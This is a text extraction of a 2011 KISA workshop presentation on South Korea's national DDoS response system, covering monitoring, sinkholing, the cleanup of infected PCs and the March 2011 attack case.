Upload
swain
View
49
Download
0
Embed Size (px)
DESCRIPTION
System and Policy in Korea on cyber attacks. 2011.11.28 Jeong Min, Lee KISA. Contents. Korea Cyber Security Framework DDoS Response System Security Monitoring Center Detection Tools DNS Sinkhole Cyber Cure System for Infected PCs DDoS Cyber Shelter DDoS Response Case : - PowerPoint PPT Presentation
Citation preview
Capacity Development Workshop on
Public Information Management
System and Policy in Koreaon cyber attacks
2011.11.28Jeong Min, Lee
KISA
Capacity Development Workshop on
Public Information Management
Contents• Korea Cyber Security Framework• DDoS Response System
– Security Monitoring Center– Detection Tools– DNS Sinkhole– Cyber Cure System for Infected PCs– DDoS Cyber Shelter
• DDoS Response Case :– 3.4 DDoS in 2011
Capacity Development Workshop on
Public Information Management
Korea Cyber Security Frame-work
Capacity Development Workshop on
Public Information Management
Cyber Crisis Response Frame-workPresident
National CenterFor Crisis Manage-
ment
Ministry ofNational Defense
Defense Security Command
Military Area/each unit
Korea CommunicationsCommission
KrCERT/CC
Critical Infrastructuresin Private Sector
NationalIntelligence Service
KNCERT/CCCritical Infrastructures
inGovernment/Public Sec-
tor
Capacity Development Workshop on
Public Information Management
Security Cooperation Frame-work
Capacity Development Workshop on
Public Information Management
Distributed Denial of Service At-tack
Capacity Development Workshop on
Public Information Management
DDoS Attack Response
Capacity Development Workshop on
Public Information Management
Security Monitoring Center
Capacity Development Workshop on
Public Information Management
Capacity Development Workshop on
Public Information Management
DDoS Nation Wide Anti-DDoS System
DDoS Detection
system
DDoS Detection
system
IX(Internet eXchange)
BackboneRouter
A ISP
B ISP
Ix Ruter IX Router
Legitimate Traffic
IDC, Internet Biz company, Internet Service Provides, etc
IDC, Internet Biz company, Internet Service Provides, etc
DDoS Attack Traffic
Block or
Detour
ConnectedBlock or Detour
DDoS Attack Traffic DDoS Attack TrafficNormal Traffic Normal Traffic
Connected
Capacity Development Workshop on
Public Information Management
Detection Tools: Malicious code analysis(Utilize Hon-
eyNet)
Capacity Development Workshop on
Public Information Management
Web Hacking Malicious Code De-tection (MC-Finder)
Web Service Provider
All Domains registered in Korea(1.8 million)
1. Update detection rule Malicious Code Finding
System(MC-Finder)
2. Check hidden malicious URL in website
3. Request to block foreign malicious URL
ISP
Staff on duty
KT T Broad
SK Broad-band
4. Request to remove malicious URL
Malicioius URL(Dissemination,
Route)
KISA
Capacity Development Workshop on
Public Information Management
DNS Sinkhole : Block BotNet
Capacity Development Workshop on
Public Information Management
Cyber Cure System for In-fected PCs
1.Collect infected PC IP
Target website
DDoS attack
2. Operate cyber cure System
ISP
ISP
ISP
3. Popup window for notification
4. Dedicated vaccine
Zombie PC
Stop!Cure zombie PC
Cyber cure system
Download dedicated vaccine
Capacity Development Workshop on
Public Information Management
DDoS Cyber Shelter
Capacity Development Workshop on
Public Information Management
Case Study :Success Story of KR DDoSattack countermeasure by
KISA
Capacity Development Workshop on
Public Information Management
Overview of 3.4 DDoS(1)• 2011.3.4~
3.15(about 10 days)• Attack Target : 40 in-
stitutions– 24 Government and
Public institutions– 9 Financial institutions– 7 Portal & Shopping
Mall
Capacity Development Workshop on
Public Information Management
March and July DDoS attacks are Similar
Classification Mar 4th July 7th
# of Zombie PCs 116,299 115,044
# of Target websites 40 36
# of Blocked C&C Servers 748 538
# of Destroyed HDDs 756 1,466
Capacity Development Workshop on
Public Information Management
March DDoS Method is more Intelligent and destructive than July
• 3.4 DDoS Attack attempted only at-tack of disturbing the system net-work with very high technology, so that this attack is deemed as the testing kind’s prior attack for check-ing Korea’s state of defense.– (Dmitri Alperovitch, vice president of
McAfee, DongA Ilbo Interview dated on July 9, 2011)
Capacity Development Workshop on
Public Information Management
Depending on the response, the attack is continuing to change
KISA Response
Vaccine distribution via www.boho.or.kr
Effective defense against DDoS Attack
Hard disk damage pre-vention guideline
Change in Attack Method
Block zombie PC’s ac-cess to www.boho.or.kr
Destroy HDD just after the infection
HDD is destroyed even at safe mode booting
Capacity Development Workshop on
Public Information Management
Nationwide Cyber Security Alert System
Capacity Development Workshop on
Public Information Management
DDoS Nation Wide Anti-DDoS System
DDoS Detection
system
DDoS Detection
system
IX(Internet eXchange)
BackboneRouter
A ISP
B ISP
Ix Ruter IX Router
Legitimate Traffic
IDC, Internet Biz company, Internet Service Provides, etc
IDC, Internet Biz company, Internet Service Provides, etc
DDoS Attack Traffic
Block or
Detour
ConnectedBlock or Detour
DDoS Attack Traffic DDoS Attack TrafficNormal Traffic Normal Traffic
Connected
Capacity Development Workshop on
Public Information Management
DDoS Cyber Shelter
Capacity Development Workshop on
Public Information Management
Cyber Cure System for In-fected PCs
1.Collect infected PC IP
Target website
DDoS attack
2. Operate cyber cure System
ISP
ISP
ISP
3. Popup window for notification
4. Dedicated vaccine
Zombie PC
Stop!Cure zombie PC
Cyber cure system
Download dedicated vaccine
Capacity Development Workshop on
Public Information Management
THANK YOU!